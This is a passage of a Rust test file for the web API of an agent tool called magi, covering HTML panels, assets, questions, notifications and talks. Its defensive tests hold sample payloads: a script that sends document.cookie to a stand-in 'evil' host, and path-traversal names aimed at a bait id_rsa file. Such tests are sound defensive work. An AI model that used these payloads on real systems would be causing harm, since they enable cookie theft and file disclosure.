4719 .await
4720 .expect("write request head");
4721 socket.write_all(body).await.expect("write request body");
4722 let mut raw = Vec::new();
4723 socket.read_to_end(&mut raw).await.expect("read response");
4724 let split = raw
4725 .windows(4)
4726 .position(|w| w == b"\r\n\r\n")
4727 .expect("a header block");
4728 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4729 let bytes = raw[split + 4..].to_vec();
4730 let status = head
4731 .lines()
4732 .next()
4733 .and_then(|line| line.split_whitespace().nth(1))
4734 .and_then(|code| code.parse().ok())
4735 .expect("a status line");
4736 Res {
4737 status,
4738 headers: head.to_lowercase(),
4739 head,
4740 body: String::from_utf8_lossy(&bytes).into_owned(),
4741 bytes,
4742 }
4743 }
4744
4745 fn write_run(runs: &FsPath, id: &str, status: RunStatus) {
4747 let mut state = RunState::new(
4748 PathBuf::from("/repo/magi"),
4749 "main".to_owned(),
4750 "0123456789abcdef".to_owned(),
4751 "Add a web UI\n\nMobile first.".to_owned(),
4752 Config::default(),
4753 );
4754 state.id = id.to_owned();
4755 state.status = status;
4756 let dir = runs.join(id);
4757 std::fs::create_dir_all(&dir).expect("run dir");
4758 std::fs::write(
4759 dir.join("run.json"),
4760 serde_json::to_string_pretty(&state).expect("serialize run"),
4761 )
4762 .expect("write run.json");
4763 }
4764
4765 fn write_daemon(home: &FsPath, updated_at: Timestamp) {
4766 let body = serde_json::json!({
4767 "schema": 1,
4768 "pid": 4242,
4769 "started_at": Timestamp::now().to_string(),
4770 "updated_at": updated_at.to_string(),
4771 "idle": false,
4772 "current": [{ "task": "20260902-140501-aaaa", "run": "20260902-140502-bbbb" }],
4773 "completed": 7,
4774 "polls": 143,
4775 });
4776 std::fs::write(home.join("daemon.json"), body.to_string()).expect("write daemon.json");
4777 }
4778
4779 fn launch_idle(
4789 _opts: daemon::Opts,
4790 stop: daemon::Stop,
4791 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4792 Box::pin(async move {
4793 while !stop.stopped() {
4794 tokio::time::sleep(Duration::from_millis(2)).await;
4795 }
4796 Ok(())
4797 })
4798 }
4799
4800 fn launch_broken(
4803 _opts: daemon::Opts,
4804 _stop: daemon::Stop,
4805 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4806 Box::pin(async {
4807 Err(anyhow::anyhow!(
4808 "publish the daemon status file: read-only file system"
4809 ))
4810 })
4811 }
4812
4813 static PARK_KNOCK: std::sync::Mutex<Option<SocketAddr>> = std::sync::Mutex::new(None);
4820 static PARK_HEARD: std::sync::Mutex<Option<u16>> = std::sync::Mutex::new(None);
4821
4822 fn launch_knocking_on_the_way_out(
4829 _opts: daemon::Opts,
4830 stop: daemon::Stop,
4831 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4832 Box::pin(async move {
4833 while !stop.stopped() {
4834 tokio::time::sleep(Duration::from_millis(2)).await;
4835 }
4836 let addr = PARK_KNOCK
4837 .lock()
4838 .expect("park knock")
4839 .expect("the test set an address");
4840 let heard = request(addr, "GET", "/api/health", None).await.status;
4841 *PARK_HEARD.lock().expect("park heard") = Some(heard);
4842 Ok(())
4843 })
4844 }
4845
4846 async fn settled(fx: &Fixture, want: fn(&Value) -> bool) -> Value {
4855 for _ in 0..SETTLE_STEPS {
4856 let view = fx.get("/api/loop").await.json();
4857 if want(&view) {
4858 return view;
4859 }
4860 tokio::time::sleep(Duration::from_millis(10)).await;
4861 }
4862 panic!(
4863 "the loop never settled: {}",
4864 fx.get("/api/loop").await.json()
4865 );
4866 }
4867
4868 fn ask(fx: &Fixture, summary: &str, choices: &[&str]) -> String {
4870 let store = fx.questions();
4871 let mut q = Question::new(
4872 "20260902-000000-beef".to_owned(),
4873 "implement".to_owned(),
4874 "impl-A".to_owned(),
4875 summary.to_owned(),
4876 "because it matters".to_owned(),
4877 choices.iter().map(|c| (*c).to_owned()).collect(),
4878 );
4879 store.put(&mut q).expect("put question");
4880 q.id
4881 }
4882
4883 fn panel(fx: &Fixture, html: &str, assets: &[(&str, &[u8])]) -> String {
4889 let store = fx.questions();
4890 let mut q = Question::new(
4891 "20260902-000000-beef".to_owned(),
4892 "land".to_owned(),
4893 "fix".to_owned(),
4894 "Merge this?".to_owned(),
4895 "the diff is in the panel".to_owned(),
4896 vec!["merge".to_owned(), "hold".to_owned()],
4897 );
4898 let staging = fx.home.path().join("staging");
4901 std::fs::create_dir_all(&staging).expect("staging dir");
4902 let sources: Vec<PathBuf> = assets
4903 .iter()
4904 .map(|(name, bytes)| {
4905 let path = staging.join(name);
4906 std::fs::write(&path, bytes).expect("write staged asset");
4907 path
4908 })
4909 .collect();
4910 store
4911 .put_panel(&mut q, html, &sources)
4912 .expect("write the panel");
4913 store.put(&mut q).expect("put question");
4914 q.id
4915 }
4916
4917 fn seed_talk(fx: &Fixture, id: &str, status: &str) -> String {
4926 let store = fx.talks();
4927 std::fs::create_dir_all(store.root()).expect("talks dir");
4928 let seat = serde_json::to_value(crate::agent::SeatState::new("talk", "mock", 7))
4929 .expect("serialize a seat");
4930 let body = serde_json::json!({
4931 "schema": 1,
4932 "id": id,
4933 "repo": "/repo/magi",
4934 "agent": "mock",
4935 "status": status,
4936 "turns": [],
4937 "created_at": Timestamp::now().to_string(),
4938 "updated_at": Timestamp::now().to_string(),
4939 "seat": seat,
4940 });
4941 std::fs::write(store.path_of(id), body.to_string()).expect("write the talk");
4942 store.get(id).expect("the seeded talk has to be readable");
4943 id.to_owned()
4944 }
4945
4946 #[tokio::test]
4947 async fn both_panel_routes_send_the_whole_policy_that_makes_agent_html_safe() {
4948 let fx = Fixture::start().await;
4949 let id = panel(
4950 &fx,
4951 "<h1>Merge?</h1><img src=\"diff.svg\">",
4952 &[("diff.svg", b"<svg xmlns='http://www.w3.org/2000/svg'/>")],
4953 );
4954
4955 for path in [
4956 format!("/api/questions/{id}/panel"),
4957 format!("/api/questions/{id}/asset/diff.svg"),
4958 ] {
4959 let res = fx.get(&path).await;
4960 assert_eq!(res.status, 200, "{path}: {}", res.body);
4961 assert_eq!(
4967 res.header("content-security-policy"),
4968 Some(
4969 "default-src 'none'; img-src 'self' data:; style-src 'unsafe-inline'; \
4970 font-src data:; base-uri 'none'; form-action 'none'; \
4971 frame-ancestors 'self'"
4972 ),
4973 "{path} is the only thing between a hostile panel and the tailnet"
4974 );
4975 assert_eq!(
4976 res.header("x-content-type-options"),
4977 Some("nosniff"),
4978 "{path}: a browser must not re-decide the type we sent"
4979 );
4980 assert_eq!(
4981 res.header("referrer-policy"),
4982 Some("no-referrer"),
4983 "{path}: a panel must not leak the question id off the machine"
4984 );
4985
4986 let pre = fx.head(&path).await;
4991 assert_eq!(pre.status, res.status, "{path}: HEAD must agree with GET");
4992 assert_eq!(
4993 pre.header("content-security-policy"),
4994 res.header("content-security-policy"),
4995 "{path}: the preflight carries the same policy"
4996 );
4997 assert_eq!(
4998 pre.header("content-type"),
4999 res.header("content-type"),
5000 "{path}: the preflight carries the same type"
5001 );
5002 }
5003 }
5004
5005 #[tokio::test]
5006 async fn a_panel_reaches_the_browser_byte_for_byte() {
5007 let fx = Fixture::start().await;
5008 let html = "<h1>Merge?</h1><p>a < b — 変更</p><script>alert(1)</script>";
5013 let id = panel(&fx, html, &[]);
5014
5015 let res = fx.get(&format!("/api/questions/{id}/panel")).await;
5016
5017 assert_eq!(res.status, 200);
5018 assert_eq!(res.bytes, html.as_bytes(), "served verbatim, not sanitised");
5019 assert_eq!(res.header("content-type"), Some("text/html; charset=utf-8"));
5020 assert_eq!(
5021 res.header("content-disposition"),
5022 None,
5023 "the panel itself is rendered in the frame, not downloaded"
5024 );
5025 }
5026
5027 #[tokio::test]
5028 async fn an_svg_asset_is_a_download_and_a_png_is_not() {
5029 let fx = Fixture::start().await;
5030 let svg = b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>";
5031 let png = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR".as_slice();
5032 let id = panel(
5033 &fx,
5034 "<img src=\"diff.svg\"><img src=\"shot.png\">",
5035 &[("diff.svg", svg), ("shot.png", png)],
5036 );
5037
5038 let as_svg = fx.get(&format!("/api/questions/{id}/asset/diff.svg")).await;
5039 let as_png = fx.get(&format!("/api/questions/{id}/asset/shot.png")).await;
5040
5041 assert_eq!(as_svg.status, 200);
5042 assert_eq!(as_svg.header("content-type"), Some("image/svg+xml"));
5043 assert_eq!(as_svg.header("content-disposition"), Some("attachment"));
5048
5049 assert_eq!(as_png.status, 200);
5050 assert_eq!(as_png.header("content-type"), Some("image/png"));
5051 assert_eq!(
5052 as_png.header("content-disposition"),
5053 None,
5054 "a raster image has no execution surface, so tapping it still shows it"
5055 );
5056 assert_eq!(as_png.bytes, png, "a binary asset survives the round trip");
5057 }
5058
5059 #[tokio::test]
5060 async fn an_html_asset_is_never_served_as_html() {
5061 let fx = Fixture::start().await;
5062 let id = panel(
5063 &fx,
5064 "<p>see the notes</p>",
5065 &[
5066 (
5067 "notes.html",
5068 b"<script>fetch('http://evil/'+document.cookie)</script>",
5069 ),
5070 ("hook.js", b"fetch('http://evil/')"),
5071 ("data.json", b"{}"),
5072 ("HEADLINE.TXT", b"plain"),
5073 ],
5074 );
5075
5076 for name in ["notes.html", "hook.js", "data.json"] {
5077 let res = fx.get(&format!("/api/questions/{id}/asset/{name}")).await;
5078 assert_eq!(res.status, 200, "{name}: {}", res.body);
5079 assert_eq!(
5084 res.header("content-type"),
5085 Some("application/octet-stream"),
5086 "{name} must not be a type the browser will execute or render"
5087 );
5088 }
5089 let txt = fx
5092 .get(&format!("/api/questions/{id}/asset/HEADLINE.TXT"))
5093 .await;
5094 assert_eq!(
5095 txt.header("content-type"),
5096 Some("text/plain; charset=utf-8")
5097 );
5098 }
5099
5100 #[tokio::test]
5101 async fn no_spelling_of_a_traversing_asset_name_reaches_the_filesystem() {
5102 let fx = Fixture::start().await;
5103 let id = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
5104 std::fs::write(fx.questions().root().join("id_rsa"), b"secret").expect("write the bait");
5108
5109 for encoded in [
5116 "%2e%2e%2fid_rsa",
5117 "..%2fid_rsa",
5118 "..%5cid_rsa",
5119 "%2e%2e%5cid_rsa",
5120 "diff%00.svg",
5121 "..",
5122 ".hidden",
5123 "%2e%2e%2f%2e%2e%2fid_rsa",
5124 ] {
5125 let res = fx
5126 .get(&format!("/api/questions/{id}/asset/{encoded}"))
5127 .await;
5128 assert_eq!(
5129 res.status, 400,
5130 "`{encoded}` has to be refused by name, not looked up: {}",
5131 res.body
5132 );
5133 assert!(res.json()["error"].is_string(), "{}", res.body);
5134 }
5135
5136 for literal in ["../id_rsa", "../../questions/id_rsa", "..%5c../id_rsa"] {
5142 let res = fx
5143 .get(&format!("/api/questions/{id}/asset/{literal}"))
5144 .await;
5145 assert_eq!(
5146 res.status, 404,
5147 "`{literal}` must not match the asset route at all: {}",
5148 res.body
5149 );
5150 }
5151 }
5152
5153 #[tokio::test]
5154 async fn a_missing_panel_and_an_unknown_asset_are_both_json_404s() {
5155 let fx = Fixture::start().await;
5156 let plain = ask(&fx, "Which backend?", &["SQLite"]);
5157 let with_panel = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
5158
5159 let none = fx.get(&format!("/api/questions/{plain}/panel")).await;
5163 assert_eq!(none.status, 404, "{}", none.body);
5164 assert!(none.json()["error"].is_string(), "{}", none.body);
5165 assert_eq!(
5166 fx.head(&format!("/api/questions/{plain}/panel"))
5167 .await
5168 .status,
5169 404,
5170 "the preflight is the only way the client can learn this"
5171 );
5172
5173 let missing = fx
5175 .get(&format!("/api/questions/{with_panel}/asset/absent.png"))
5176 .await;
5177 assert_eq!(missing.status, 404, "{}", missing.body);
5178 assert!(missing.json()["error"].is_string(), "{}", missing.body);
5179
5180 assert_eq!(fx.get("/api/questions/nope/panel").await.status, 404);
5182 assert_eq!(
5183 fx.get("/api/questions/nope/asset/diff.svg").await.status,
5184 404
5185 );
5186 }
5187
5188 #[tokio::test]
5189 async fn a_run_with_an_open_question_reads_as_waiting() {
5190 let fx = Fixture::start().await;
5191 let run = "20260902-000000-beef".to_owned();
5192 write_run(&fx.runs(), &run, RunStatus::Implementing);
5193
5194 let before = fx.get("/api/runs").await.json();
5195 assert_eq!(before[0]["waiting"], false, "{before}");
5196
5197 let store = fx.questions();
5198 let mut q = Question::new(
5199 run.clone(),
5200 "implement".to_owned(),
5201 "impl-A".to_owned(),
5202 "Which backend?".to_owned(),
5203 String::new(),
5204 vec!["SQLite".to_owned()],
5205 );
5206 store.put(&mut q).expect("put");
5207
5208 let during = fx.get("/api/runs").await.json();
5209 assert_eq!(during[0]["waiting"], true, "{during}");
5210
5211 q.answer(Answer::Choice("SQLite".to_owned()))
5214 .expect("answer");
5215 store.put(&mut q).expect("put");
5216 let after = fx.get("/api/runs").await.json();
5217 assert_eq!(after[0]["waiting"], false, "{after}");
5218 }
5219
5220 #[tokio::test]
5221 async fn an_open_question_is_listed_and_counted_by_health() {
5222 let fx = Fixture::start().await;
5223 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5224
5225 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5226 let listed = fx.get("/api/questions").await.json();
5227 assert_eq!(listed.as_array().expect("array").len(), 1);
5228 assert_eq!(listed[0]["id"], id);
5229 assert_eq!(listed[0]["status"], "open");
5230 assert_eq!(listed[0]["choices"][1], "Redis");
5231 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5234 }
5235
5236 #[tokio::test]
5237 async fn answering_records_the_choice_and_a_second_answer_conflicts() {
5238 let fx = Fixture::start().await;
5239 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5240 let path = format!("/api/questions/{id}/answer");
5241
5242 let res = fx.post(&path, Some(r#"{"choice":"Redis"}"#)).await;
5243 assert_eq!(res.status, 200, "{}", res.body);
5244 let body = res.json();
5245 assert_eq!(body["status"], "answered");
5246 assert_eq!(body["answer"]["choice"], "Redis");
5247
5248 let again = fx.post(&path, Some(r#"{"choice":"SQLite"}"#)).await;
5252 assert_eq!(again.status, 409, "{}", again.body);
5253 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5254 }
5255
5256 #[tokio::test]
5257 async fn saying_something_appends_a_turn_without_answering() {
5258 let fx = Fixture::start().await;
5259 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5260 let path = format!("/api/questions/{id}/say");
5261
5262 let res = fx
5263 .post(&path, Some(r#"{"body":"why not Postgres?"}"#))
5264 .await;
5265 assert_eq!(res.status, 200, "{}", res.body);
5266 let body = res.json();
5267 assert_eq!(body["status"], "open", "talking back is not a decision");
5268 assert_eq!(body["answer"], Value::Null);
5269 assert_eq!(body["thread"][0]["who"], "operator");
5270 assert_eq!(body["thread"][0]["body"], "why not Postgres?");
5271 assert_eq!(body["waiting_on_agent"], true);
5272 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5274 }
5275
5276 #[tokio::test]
5277 async fn asking_back_clears_the_owner_count_until_the_agent_replies() {
5278 let fx = Fixture::start().await;
5279 let store = fx.questions();
5280 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5281 assert_eq!(
5282 fx.get("/api/health").await.json()["questions_needs_owner"],
5283 1
5284 );
5285
5286 let res = fx
5292 .post(
5293 &format!("/api/questions/{id}/say"),
5294 Some(r#"{"body":"why not Postgres?"}"#),
5295 )
5296 .await;
5297 assert_eq!(res.status, 200, "{}", res.body);
5298 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5299 assert_eq!(
5300 fx.get("/api/health").await.json()["questions_needs_owner"],
5301 0,
5302 "waiting on the agent is not waiting on the owner"
5303 );
5304
5305 let mut q = store.get(&id).expect("get");
5309 q.reply("because SQLite needs no server", vec!["SQLite".to_owned()])
5310 .expect("reply");
5311 store.put(&mut q).expect("put");
5312 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5313 assert_eq!(
5314 fx.get("/api/health").await.json()["questions_needs_owner"],
5315 1,
5316 "the agent's reply is what should light the banner back up"
5317 );
5318 }
5319
5320 #[tokio::test]
5321 async fn saying_something_is_refused_when_empty_answered_or_abandoned() {
5322 let fx = Fixture::start().await;
5323 let store = fx.questions();
5324
5325 let empty_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5326 let res = fx
5327 .post(
5328 &format!("/api/questions/{empty_id}/say"),
5329 Some(r#"{"body":" "}"#),
5330 )
5331 .await;
5332 assert_eq!(res.status, 400, "{}", res.body);
5333
5334 let answered_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5335 let mut answered = store.get(&answered_id).expect("get");
5336 answered
5337 .answer(Answer::Choice("SQLite".to_owned()))
5338 .expect("answer");
5339 store.put(&mut answered).expect("put");
5340 let res = fx
5341 .post(
5342 &format!("/api/questions/{answered_id}/say"),
5343 Some(r#"{"body":"still there?"}"#),
5344 )
5345 .await;
5346 assert_eq!(res.status, 409, "{}", res.body);
5347
5348 let abandoned_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5349 let mut abandoned = store.get(&abandoned_id).expect("get");
5350 abandoned.abandon("timed out");
5351 store.put(&mut abandoned).expect("put");
5352 let res = fx
5353 .post(
5354 &format!("/api/questions/{abandoned_id}/say"),
5355 Some(r#"{"body":"still there?"}"#),
5356 )
5357 .await;
5358 assert_eq!(res.status, 409, "{}", res.body);
5359 }
5360
5361 #[tokio::test]
5362 async fn an_answer_the_question_does_not_offer_is_refused() {
5363 let fx = Fixture::start().await;
5364 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5365 let path = format!("/api/questions/{id}/answer");
5366
5367 for body in [
5368 r#"{"choice":"Postgres"}"#,
5369 r#"{"text":"whatever you think"}"#,
5370 r#"{"choice":"Redis","text":"both"}"#,
5371 r#"{}"#,
5372 ] {
5373 let res = fx.post(&path, Some(body)).await;
5374 assert_eq!(res.status, 400, "{body} should be refused: {}", res.body);
5375 assert!(res.json()["error"].is_string(), "{}", res.body);
5376 }
5377 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5379 }
5380
5381 #[tokio::test]
5382 async fn a_free_text_question_takes_text_and_not_a_choice() {
5383 let fx = Fixture::start().await;
5384 let id = ask(&fx, "What should the flag be called?", &[]);
5385 let path = format!("/api/questions/{id}/answer");
5386
5387 assert_eq!(
5388 fx.post(&path, Some(r#"{"choice":"--json"}"#)).await.status,
5389 400
5390 );
5391 let res = fx.post(&path, Some(r#"{"text":"--json"}"#)).await;
5392 assert_eq!(res.status, 200, "{}", res.body);
5393 assert_eq!(res.json()["answer"]["text"], "--json");
5394 }
5395
5396 #[tokio::test]
5397 async fn an_unknown_question_is_a_json_404() {
5398 let fx = Fixture::start().await;
5399 let res = fx
5400 .post("/api/questions/nope/answer", Some(r#"{"text":"x"}"#))
5401 .await;
5402 assert_eq!(res.status, 404, "{}", res.body);
5403 assert!(res.json()["error"].is_string());
5404 }
5405
5406 #[tokio::test]
5407 async fn notifications_list_read_dismiss_and_health_agree() {
5408 let fx = Fixture::start().await;
5409 let store = Notices::at(fx.home.path().join("notifications"));
5410 assert_eq!(fx.get("/api/notifications").await.json()["unread"], 0);
5411 let rev0 = fx.get("/api/health").await.json()["notifications_rev"].clone();
5412
5413 let a = store.raise(Notice::warn("task:1", "held")).unwrap();
5414 let b = store.raise(Notice::error("run:2", "blocked")).unwrap();
5415
5416 let health = fx.get("/api/health").await.json();
5417 assert_eq!(health["notifications_unread"], 2);
5418 assert_ne!(
5419 health["notifications_rev"], rev0,
5420 "the badge must move live"
5421 );
5422
5423 let listed = fx.get("/api/notifications").await.json();
5424 assert_eq!(listed["unread"], 2);
5425 assert_eq!(listed["items"].as_array().unwrap().len(), 2);
5426 assert_eq!(listed["items"][0]["severity"], "error", "newest first");
5427
5428 let read = fx
5429 .post(&format!("/api/notifications/{}/read", a.id), None)
5430 .await;
5431 assert_eq!(read.status, 200, "{}", read.body);
5432 assert_eq!(fx.get("/api/notifications").await.json()["unread"], 1);
5433
5434 let gone = fx
5435 .post(&format!("/api/notifications/{}/dismiss", b.id), None)
5436 .await;
5437 assert_eq!(gone.status, 200, "{}", gone.body);
5438 let listed = fx.get("/api/notifications").await.json();
5439 assert_eq!(listed["items"].as_array().unwrap().len(), 1);
5440 assert_eq!(listed["unread"], 0);
5441
5442 store.raise(Notice::info("x", "again")).unwrap();
5443 let all = fx.post("/api/notifications/read-all", None).await;
5444 assert_eq!(all.status, 200, "{}", all.body);
5445 assert_eq!(all.json()["marked"], 1);
5446 assert_eq!(
5447 fx.get("/api/health").await.json()["notifications_unread"],
5448 0
5449 );
5450
5451 let missing = fx.post("/api/notifications/nope/read", None).await;
5452 assert_eq!(missing.status, 404, "{}", missing.body);
5453 assert!(missing.json()["error"].is_string());
5454 }
5455
5456 #[tokio::test]
5463 async fn a_task_cannot_be_filed_over_the_phone_directly() {
5464 let f = Fixture::start().await;
5465
5466 let res = f
5467 .post(
5468 "/api/queue",
5469 Some(r#"{"instruction":"Add a --json flag to magi list"}"#),
5470 )
5471 .await;
5472
5473 assert_eq!(
5474 res.status, 405,
5475 "POST /api/queue must not be a route: {}",
5476 res.body
5477 );
5478 assert!(
5479 f.queue().list().is_empty(),
5480 "a task filed by a route that does not exist must not reach the disk"
5481 );
5482 assert_eq!(f.get("/api/queue").await.status, 200);
5485 }
5486
5487 fn make_checkout(root: &FsPath, host: &str, owner: &str, repo: &str) {
5489 std::fs::create_dir_all(root.join(host).join(owner).join(repo).join(".git"))
5490 .expect("checkout dir");
5491 }
5492
5493 #[tokio::test]
5494 async fn repos_list_returns_name_and_path_for_every_configured_root() {
5495 let tmp = TempDir::new().expect("tempdir");
5496 let repo = tmp.path().join("repo");
5497 std::fs::create_dir_all(&repo).expect("repo dir");
5498 let root = tmp.path().join("root");
5499 make_checkout(&root, "github.com", "yukimemi", "magi");
5500 std::fs::write(
5501 repo.join("magi.toml"),
5502 format!(
5503 "[repos]\nroots = [{:?}]\n",
5504 root.to_string_lossy().into_owned()
5505 ),
5506 )
5507 .expect("write magi.toml");
5508
5509 let f = Fixture::with_repo(repo).await;
5510 let res = f.get("/api/repos").await;
5511 assert_eq!(res.status, 200, "{}", res.body);
5512 let list = res.json();
5513 let repos = list.as_array().expect("an array");
5514 assert_eq!(repos.len(), 1);
5515 assert_eq!(repos[0]["name"], "yukimemi/magi");
5516 assert!(
5517 repos[0]["path"]
5518 .as_str()
5519 .is_some_and(|p| p.ends_with("magi") || p.contains("magi")),
5520 "{list}"
5521 );
5522 }
5523
5524 #[tokio::test]
5525 async fn repos_list_only_rescans_within_the_ttl_when_asked_to() {
5526 let tmp = TempDir::new().expect("tempdir");
5527 let repo = tmp.path().join("repo");
5528 std::fs::create_dir_all(&repo).expect("repo dir");
5529 let root = tmp.path().join("root");
5530 make_checkout(&root, "github.com", "yukimemi", "magi");
5531 std::fs::write(
5532 repo.join("magi.toml"),
5533 format!(
5534 "[repos]\nroots = [{:?}]\nscan_ttl = 3600\n",
5535 root.to_string_lossy().into_owned()
5536 ),
5537 )
5538 .expect("write magi.toml");
5539
5540 let f = Fixture::with_repo(repo).await;
5541 let first = f.get("/api/repos").await;
5542 assert_eq!(first.json().as_array().map(Vec::len), Some(1));
5543
5544 make_checkout(&root, "github.com", "yukimemi", "rvpm");
5547 let second = f.get("/api/repos").await;
5548 assert_eq!(
5549 second.json().as_array().map(Vec::len),
5550 Some(1),
5551 "a fresh cache must not rescan inside the TTL"
5552 );
5553
5554 let refreshed = f.get("/api/repos?refresh=1").await;
5555 assert_eq!(
5556 refreshed.json().as_array().map(Vec::len),
5557 Some(2),
5558 "an explicit refresh must rescan even inside the TTL"
5559 );
5560 }
5561
5562 const MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && printf ok\"]\n";
5568
5569 async fn talk_fixture() -> (TempDir, PathBuf, Fixture) {
5573 let tmp = TempDir::new().expect("tempdir");
5574 let repo = tmp.path().join("repo");
5575 std::fs::create_dir_all(&repo).expect("repo dir");
5576 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5577 let f = Fixture::with_repo(repo.clone()).await;
5578 (tmp, repo, f)
5579 }
5580
5581 #[tokio::test]
5582 async fn posting_a_talk_with_no_body_opens_one_and_takes_no_turn() {
5583 let (_tmp, _repo, f) = talk_fixture().await;
5584
5585 let opened = f.post("/api/talks", None).await;
5588 assert_eq!(opened.status, 201, "{}", opened.body);
5589 let body = opened.json();
5590 assert_eq!(body["status"], "open");
5591 assert_eq!(
5592 body["turns"].as_array().unwrap().len(),
5593 0,
5594 "opening takes no agent turn: there is nothing yet to answer"
5595 );
5596
5597 let also_opened = f.post("/api/talks", Some("{}")).await;
5599 assert_eq!(also_opened.status, 201, "{}", also_opened.body);
5600
5601 let listed = f.get("/api/talks").await.json();
5602 assert_eq!(listed.as_array().unwrap().len(), 2);
5603 }
5604
5605 #[tokio::test]
5606 async fn talk_detail_lists_the_tasks_it_has_filed_and_stays_open() {
5607 let f = Fixture::start().await;
5608 let talk_id = seed_talk(&f, "20260904-014455-ab12", "open");
5609 let queue = f.queue();
5610 let mut mine = Task::new(
5611 "rename the loader".to_owned(),
5612 "rename the loader".to_owned(),
5613 PathBuf::from("/repo/magi"),
5614 Source::Agent {
5615 run: talk_id.clone(),
5616 node: "chat".to_owned(),
5617 },
5618 );
5619 queue.put(&mut mine).expect("file the task");
5620 let mut theirs = Task::new(
5621 "unrelated".to_owned(),
5622 "unrelated".to_owned(),
5623 PathBuf::from("/repo/magi"),
5624 Source::Human,
5625 );
5626 queue.put(&mut theirs).expect("file the task");
5627
5628 let res = f.get(&format!("/api/talks/{talk_id}")).await;
5629 assert_eq!(res.status, 200, "{}", res.body);
5630 let body = res.json();
5631 assert_eq!(
5632 body["status"], "open",
5633 "filing a task does not close a talk"
5634 );
5635 let tasks = body["tasks"].as_array().expect("tasks array");
5636 assert_eq!(tasks.len(), 1, "only this talk's own task is listed");
5637 assert_eq!(tasks[0]["id"], mine.id);
5638 }
5639
5640 #[tokio::test]
5641 async fn talk_say_records_the_operators_turn_before_the_agents_reply_lands() {
5642 let (_tmp, _repo, f) = talk_fixture().await;
5643 let id = f.post("/api/talks", None).await.json()["id"]
5644 .as_str()
5645 .expect("id")
5646 .to_owned();
5647
5648 let res = f
5649 .post(
5650 &format!("/api/talks/{id}/say"),
5651 Some(r#"{"text":"what does the queue module do?"}"#),
5652 )
5653 .await;
5654 assert_eq!(res.status, 202, "{}", res.body);
5655 let queued = res.json();
5656 let turns = queued["turns"].as_array().expect("turns array");
5657 assert_eq!(
5658 turns.len(),
5659 1,
5660 "the answer reflects only what is on disk the instant it is sent, \
5661 before the agent's turn - which can run for the whole of \
5662 `[graph] timeout_talk` - has a chance to land: {queued}"
5663 );
5664 assert_eq!(turns[0]["who"], "operator");
5665 assert_eq!(turns[0]["body"], "what does the queue module do?");
5666 assert_eq!(
5667 queued["thinking"], true,
5668 "the accepted response exposes the background turn claim: {queued}"
5669 );
5670
5671 let mut turns_after = 1;
5672 for _ in 0..SETTLE_STEPS {
5673 let detail = f.get(&format!("/api/talks/{id}")).await.json();
5674 turns_after = detail["turns"].as_array().expect("turns array").len();
5675 if turns_after == 2 {
5676 break;
5677 }
5678 tokio::time::sleep(Duration::from_millis(10)).await;
5679 }
5680 assert_eq!(turns_after, 2, "the agent's reply eventually lands");
5681 }
5682
5683 #[tokio::test]
5710 async fn a_dropped_handler_future_after_recording_still_gets_an_agent_reply() {
5711 let tmp = TempDir::new().expect("tempdir");
5712 let repo = tmp.path().join("repo");
5713 std::fs::create_dir_all(&repo).expect("repo dir");
5714 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5715 let home = TempDir::new().expect("temp home");
5716 let talks = Talks::at(home.path().join("talks"));
5717 let ui = Arc::new(
5718 Ui::new(
5719 Queue::at(home.path().join("queue")),
5720 Questions::at(home.path().join("questions")),
5721 talks.clone(),
5722 home.path().join("runs"),
5723 home.path().to_path_buf(),
5724 repo.clone(),
5725 )
5726 .with_worktrees_root(home.path().join("wt")),
5727 );
5728 let cfg = config_for(&repo).await.expect("discover config");
5729
5730 for delay in 0..40u32 {
5731 let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
5732 let id = talk.id.clone();
5733
5734 let handler = tokio::spawn(talk_say(
5735 State(Arc::clone(&ui)),
5736 Path(id.clone()),
5737 Ok(Json(NewTalkTurn {
5738 text: "what does the queue module do?".to_owned(),
5739 attachments: Vec::new(),
5740 })),
5741 ));
5742 tokio::time::sleep(Duration::from_micros(u64::from(delay) * 500)).await;
5743 handler.abort();
5744 let _ = handler.await;
5747
5748 let mut turns = 0;
5749 for _ in 0..SETTLE_STEPS {
5750 if let Ok(fresh) = talks.get(&id) {
5751 turns = fresh.turns.len();
5752 if turns != 1 {
5753 break;
5754 }
5755 }
5756 tokio::time::sleep(Duration::from_millis(10)).await;
5757 }
5758 assert_ne!(
5759 turns, 1,
5760 "delay {delay}: talk {id} recorded the operator's turn but \
5761 the agent never answered - the reply task was never \
5762 started after the handler future was dropped"
5763 );
5764 }
5765 }
5766
5767 #[tokio::test]
5812 async fn a_dropped_handler_future_after_queueing_still_drains_the_draft() {
5813 let tmp = TempDir::new().expect("tempdir");
5814 let repo = tmp.path().join("repo");
5815 std::fs::create_dir_all(&repo).expect("repo dir");
5816 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5817 let home = TempDir::new().expect("temp home");
5818 let talks = Talks::at(home.path().join("talks"));
5819 let ui = Arc::new(
5820 Ui::new(
